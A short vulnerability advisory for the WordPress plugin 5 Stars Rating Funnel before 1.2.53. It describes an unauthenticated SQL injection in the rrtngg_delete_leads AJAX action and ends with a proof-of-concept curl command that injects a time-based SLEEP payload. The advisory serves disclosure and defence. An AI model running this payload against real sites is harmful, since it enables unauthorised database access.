5 Stars Rating Funnel < 1.2.53 - Unauthenticated SQLi

The plugin does not properly sanitise, validate and escape lead ids before using them in a SQL statement via the rrtngg_delete_leads AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue. There is an attempt to sanitise the input, using sanitize_text_field(), however such function is not intended to prevent SQL injections.

PoC

Create a new funnel (All Rating Funnels sub-menu) Create a new lead (Leads / Feedbacks sub-menu) Invoke the following curl command to trigger a 5 second sleep curl https://example.com/wp-admin/admin-ajax.php --data ‘action=rrtngg_delete_leads&lead;_ids[]=(SELECT SLEEP(5))) AND 1=1 #’